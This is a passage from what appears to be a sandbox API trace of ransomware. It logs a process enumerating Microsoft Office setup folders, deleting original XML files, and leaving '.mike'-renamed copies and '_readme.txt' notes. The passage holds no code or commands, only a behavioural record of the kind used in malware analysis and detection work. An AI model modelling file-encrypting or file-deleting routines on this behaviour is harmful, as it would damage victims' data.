ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0052.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.782] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.789] WriteFile (in: hFile=0x288, lpBuffer=0x21ae9a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21ae9a8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML", dwFileAttributes=0x80) returned 1 [0052.790] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0052.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.804] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8c38640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c38640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c124e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c124e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c124e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x790, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.XML.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c38640, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c38640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c38640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c124e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c124e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c38640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.806] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c124e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c124e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c38640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.806] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.806] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.806] CoTaskMemFree (pv=0x502980) [0052.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0052.807] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML", dwFileAttributes=0x80) returned 1 [0052.814] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8c5e7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c5e7a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c5e7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c5e7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c5e7a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.XML.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c5e7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c5e7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c5e7a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c5e7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c5e7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c5e7a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.817] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.817] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.817] CoTaskMemFree (pv=0x502980) [0052.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58ed930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc840bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.XML", cAlternateFileName="ONENOT~1.XML")) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0d4a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.823] WriteFile (in: hFile=0x288, lpBuffer=0x21ea694*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21ea694*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML", dwFileAttributes=0x80) returned 1 [0052.824] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0052.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.831] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8c84900, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c84900, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c5e7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c5e7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c5e7a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.XML.mike", cAlternateFileName="ONENOT~1.MIK")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c84900, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c84900, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c84900, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c84900, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c84900, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c84900, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c84900, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c84900, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c84900, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.833] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.833] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.833] CoTaskMemFree (pv=0x502980) [0052.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee827f20, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x14af010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.XML", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0052.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.835] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.840] WriteFile (in: hFile=0x288, lpBuffer=0x22119a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22119a4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML", dwFileAttributes=0x80) returned 1 [0052.840] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0052.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.847] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0052.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8caaa60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8caaa60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c84900, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8c84900, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8caaa60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.XML.mike", cAlternateFileName="OUTLOO~1.MIK")) returned 1 [0052.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8caaa60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8caaa60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8caaa60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1290, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8caaa60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8caaa60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8caaa60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8caaa60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8caaa60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8caaa60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.850] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.850] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.850] CoTaskMemFree (pv=0x502980) [0052.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5db14d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.XML", cAlternateFileName="POWERP~1.XML")) returned 1 [0052.853] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, 